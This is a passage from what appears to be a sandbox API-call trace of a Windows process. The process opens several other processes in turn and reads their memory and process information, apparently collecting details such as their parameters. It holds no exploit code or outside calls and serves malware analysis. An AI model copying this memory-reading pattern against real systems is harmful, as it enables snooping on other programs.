hProcess=0x28c, lpBaseAddress=0x403370, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0263.999] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402fd8, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0263.999] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.000] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.000] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x381020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.000] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4029c0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.000] malloc (_Size=0x58) returned 0xdb85f0 [0264.000] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403018, lpBuffer=0xdb85f0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb85f0*, lpNumberOfBytesRead=0x0) returned 1 [0264.001] free (_Block=0xdb85f0) [0264.001] CloseHandle (hObject=0x28c) returned 1 [0264.001] _ui64tow_s (in: _Value=0x36c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="876") returned 0x0 [0264.001] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="876") returned 3 [0264.001] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.001] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.002] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x28c [0264.002] GetLastError () returned 0x0 [0264.002] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.002] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x20b018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.002] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.002] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403400, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.002] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403058, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.003] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.003] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.003] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x20b020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.003] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402a40, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.003] malloc (_Size=0x74) returned 0xd9cc30 [0264.003] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403098, lpBuffer=0xd9cc30, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.004] free (_Block=0xd9cc30) [0264.004] CloseHandle (hObject=0x28c) returned 1 [0264.004] _ui64tow_s (in: _Value=0x394, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="916") returned 0x0 [0264.004] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="916") returned 3 [0264.004] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.004] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.005] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x394) returned 0x28c [0264.005] GetLastError () returned 0x0 [0264.005] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.005] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x369018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.005] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.005] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603410, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.006] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603058, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.006] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.006] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.006] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x369020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.006] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602a40, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.006] malloc (_Size=0x84) returned 0xd9cc30 [0264.006] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603098, lpBuffer=0xd9cc30, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.007] free (_Block=0xd9cc30) [0264.007] CloseHandle (hObject=0x28c) returned 1 [0264.008] _ui64tow_s (in: _Value=0x3a4, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="932") returned 0x0 [0264.008] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="932") returned 3 [0264.008] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.008] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x28c [0264.009] GetLastError () returned 0x0 [0264.009] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x204018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603410, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603058, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.009] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.010] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.010] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x204020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.010] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602a40, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.010] malloc (_Size=0x86) returned 0xd9cc30 [0264.010] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603098, lpBuffer=0xd9cc30, nSize=0x84, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.011] free (_Block=0xd9cc30) [0264.011] CloseHandle (hObject=0x28c) returned 1 [0264.011] _ui64tow_s (in: _Value=0x150, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="336") returned 0x0 [0264.011] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="336") returned 3 [0264.011] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.011] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x28c [0264.012] GetLastError () returned 0x0 [0264.012] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.012] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3c2018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.012] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.012] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6033f0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.012] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603058, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.013] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.013] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.013] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3c2020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.013] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602a40, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.013] malloc (_Size=0x62) returned 0xdafe70 [0264.013] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603098, lpBuffer=0xdafe70, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafe70*, lpNumberOfBytesRead=0x0) returned 1 [0264.014] free (_Block=0xdafe70) [0264.014] CloseHandle (hObject=0x28c) returned 1 [0264.014] _ui64tow_s (in: _Value=0x190, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="400") returned 0x0 [0264.014] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="400") returned 3 [0264.014] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.014] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.015] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x190) returned 0x28c [0264.015] GetLastError () returned 0x0 [0264.015] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.015] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2e9018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.015] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.015] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603390, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.015] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602fd8, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.016] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.016] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.016] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2e9020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.016] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6029c0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.016] malloc (_Size=0x82) returned 0xd9cc30 [0264.016] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603018, lpBuffer=0xd9cc30, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.017] free (_Block=0xd9cc30) [0264.017] CloseHandle (hObject=0x28c) returned 1 [0264.017] _ui64tow_s (in: _Value=0x44c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1100") returned 0x0 [0264.017] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1100") returned 4 [0264.017] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.017] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x44c) returned 0x28c [0264.018] GetLastError () returned 0x0 [0264.018] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.018] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3b8018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.018] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.019] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6033f0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.019] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603058, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.019] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.019] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.019] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3b8020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.019] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602a40, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.019] malloc (_Size=0x66) returned 0xdafe70 [0264.019] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603098, lpBuffer=0xdafe70, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafe70*, lpNumberOfBytesRead=0x0) returned 1 [0264.020] free (_Block=0xdafe70) [0264.020] CloseHandle (hObject=0x28c) returned 1 [0264.020] _ui64tow_s (in: _Value=0x544, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1348") returned 0x0 [0264.021] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1348") returned 4 [0264.021] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.021] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.021] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x28c [0264.021] GetLastError () returned 0x0 [0264.021] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2b5018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0xf1b00, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0xf17a8, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.022] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.022] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2b5020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0xf1190, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.023] malloc (_Size=0x42) returned 0xdacb00 [0264.023] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0xf17e8, lpBuffer=0xdacb00, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdacb00*, lpNumberOfBytesRead=0x0) returned 1 [0264.023] free (_Block=0xdacb00) [0264.023] CloseHandle (hObject=0x28c) returned 1 [0264.024] _ui64tow_s (in: _Value=0x5a8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1448") returned 0x0 [0264.024] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1448") returned 4 [0264.024] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.024] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.025] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x28c [0264.025] GetLastError () returned 0x0 [0264.025] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x382018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x581b70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x581848, lpBuffer=0x138c580, nSize=0x3e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.025] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.025] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, 